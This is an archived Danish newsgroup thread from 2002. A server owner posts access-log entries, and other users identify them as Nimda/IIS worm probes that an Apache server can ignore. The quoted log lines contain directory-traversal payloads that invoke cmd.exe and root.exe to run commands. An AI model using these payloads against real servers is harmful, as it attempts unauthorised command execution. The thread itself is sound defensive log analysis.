/ Forside / Teknologi / Internet / Sikkerhed / Nyhedsindlæg
Login
Glemt dit kodeord?
Brugernavn

Kodeord


Reklame
Top 10 brugere
Sikkerhed
#NavnPoint
stl_s 37026
arlet 26827
miritdk 20260
o.v.n. 12167
als 8951
refi 8694
tedd 8272
BjarneD 7338
Klaudi 7257
10  molokyle 6481
Hvad sker der her ?
Fra : Jimmy Lerche


Dato : 11-04-02 21:28

Hej NG

Er der en venlig sjæl som kan sige mig hvad der er sket her ?

0x503e5b7e.hrnxx2.adsl-dhcp.tele.dk - - [10/Apr/2002:01:58:04 +0200] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 278
0x503e5b7e.hrnxx2.adsl-dhcp.tele.dk - - [10/Apr/2002:01:58:04 +0200] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 276
0x503e5b7e.hrnxx2.adsl-dhcp.tele.dk - - [10/Apr/2002:01:58:04 +0200] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
0x503e5b7e.hrnxx2.adsl-dhcp.tele.dk - - [10/Apr/2002:01:58:04 +0200] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
0x503e5b7e.hrnxx2.adsl-dhcp.tele.dk - - [10/Apr/2002:01:58:04 +0200] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
0x503e5b7e.hrnxx2.adsl-dhcp.tele.dk - - [10/Apr/2002:01:58:05 +0200] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404$
0x503e5b7e.hrnxx2.adsl-dhcp.tele.dk - - [10/Apr/2002:01:58:05 +0200] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404$
0x503e5b7e.hrnxx2.adsl-dhcp.tele.dk - - [10/Apr/2002:01:58:05 +0200] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/$
0x503e5b7e.hrnxx2.adsl-dhcp.tele.dk - - [10/Apr/2002:01:58:05 +0200] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
0x503e5b7e.hrnxx2.adsl-dhcp.tele.dk - - [10/Apr/2002:01:58:05 +0200] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
0x503e5b7e.hrnxx2.adsl-dhcp.tele.dk - - [10/Apr/2002:01:58:05 +0200] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
0x503e5b7e.hrnxx2.adsl-dhcp.tele.dk - - [10/Apr/2002:01:58:05 +0200] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
0x503e5b7e.hrnxx2.adsl-dhcp.tele.dk - - [10/Apr/2002:01:58:06 +0200] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
0x503e5b7e.hrnxx2.adsl-dhcp.tele.dk - - [10/Apr/2002:01:58:06 +0200] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
0x503e5b7e.hrnxx2.adsl-dhcp.tele.dk - - [10/Apr/2002:01:58:06 +0200] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
0x503e5b7e.hrnxx2.adsl-dhcp.tele.dk - - [10/Apr/2002:01:58:06 +0200] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300

Det er taget fra min log. For mig ser det meget mistænkeligt ud?

Med venlig hilsen

Jimmy



 
 
Kasper Pedersen (11-04-2002)
Kommentar
Fra : Kasper Pedersen


Dato : 11-04-02 21:42


"Jimmy Lerche" <jle@bygma.dk> wrote in message news:3cb5ef71$0$97307$edfadb0f@dspool01.news.tele.dk...
> Hej NG
>
> Er der en venlig sjæl som kan sige mig hvad der er sket her ?
>
> 0x503e5b7e.hrnxx2.adsl-dhcp.tele.dk - - [10/Apr/2002:01:58:04 +0200] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 278

Det er bare Microsoft IIS orm. Se f.eks
http://www.google.com/search?hl=en&q=%2Fscripts%2Froot.exe%3F%2Fc%2Bdir
De maskiner du får det fra er inficeret.

Du kører Apache (1.3.23 på en Debian Linux), og vil formentlig
ligesom mig se tonsvis af det, men du har overhovedet intet at
frygte, ud over at det tager diskplads til din logfil.

Forresten er der en 1.3.24 bugfix version du måske kunne
have glæde af at opdatere til.

glem de log linier.

/Kasper



Sune Storgaard (11-04-2002)
Kommentar
Fra : Sune Storgaard


Dato : 11-04-02 21:40

"Jimmy Lerche" <jle@bygma.dk> skrev i en meddelelse
news:3cb5ef71$0$97307$edfadb0f@dspool01.news.tele.dk...
> Hej NG
>
> Er der en venlig sjæl som kan sige mig hvad der er sket her ?
>
>0x503e5b7e.hrnxx2.adsl-dhcp.tele.dk - - [10/Apr/2002:01:58:04 +0200]
"GET
>/scripts/root.exe?/c+dir HTTP/1.0" 404 278
<snip>

Nogen/noget har forsøgt at finde&udnytte et sikkerhedshul i IIS
'webserver'. Resultatet er at man kan afvikle kommandoer på den ramte
pc. Da du kører apache er du ikke sårbar for netop det exploit.

/Sune



Jimmy Lerche (11-04-2002)
Kommentar
Fra : Jimmy Lerche


Dato : 11-04-02 22:14


"Sune Storgaard" <speg-fjern-@mail.dk> skrev i en meddelelse
news:3cb5f5e6$0$58722$edfadb0f@dspool01.news.tele.dk...
> "Jimmy Lerche" <jle@bygma.dk> skrev i en meddelelse
> news:3cb5ef71$0$97307$edfadb0f@dspool01.news.tele.dk...
> > Hej NG
> >
> > Er der en venlig sjæl som kan sige mig hvad der er sket her ?
> >
> >0x503e5b7e.hrnxx2.adsl-dhcp.tele.dk - - [10/Apr/2002:01:58:04 +0200]
> "GET
> >/scripts/root.exe?/c+dir HTTP/1.0" 404 278
> <snip>
>
> Nogen/noget har forsøgt at finde&udnytte et sikkerhedshul i IIS
> 'webserver'. Resultatet er at man kan afvikle kommandoer på den ramte
> pc. Da du kører apache er du ikke sårbar for netop det exploit.
>
> /Sune
>
>

Ok...ja, jeg havde jo næsten gættet det Tak for et hurtigt svar.

P.s. Er det noget jeg skal melde til nogen... ?

-Jimmy



Kasper Pedersen (11-04-2002)
Kommentar
Fra : Kasper Pedersen


Dato : 11-04-02 22:20


"Jimmy Lerche" <jle@bygma.dk> wrote in message news:3cb5fa55$0$97303$edfadb0f@dspool01.news.tele.dk...
>
> P.s. Er det noget jeg skal melde til nogen... ?

Hvis du absolut vil, så forsøg at se om du kan finde
en email adresse på de hosts der laver de requsts,
og fortæl *venligt* at vedkommende måske skulle
kigge sin box efter for Nimda.
Desværre er det oftest default installationer af
personal web server, som folk har glemt alt
om.

'melde' er sådan et stærkt ord. Det vil i givet fald
ikke hjælpe meget at informere f.eks. teledk om
det, da deres abuse afdeling helt ærligt har andet
at tage sig til end at være mail gateway.

men
Det er meget dårlig skik at have en webserver
uden at have admin kontakt info på den!
og det gælder også dig.

/Kasper



Søg
Reklame
Statistik
Spørgsmål : 177552
Tips : 31968
Nyheder : 719565
Indlæg : 6408847
Brugere : 218887

Månedens bedste
Årets bedste
Sidste års bedste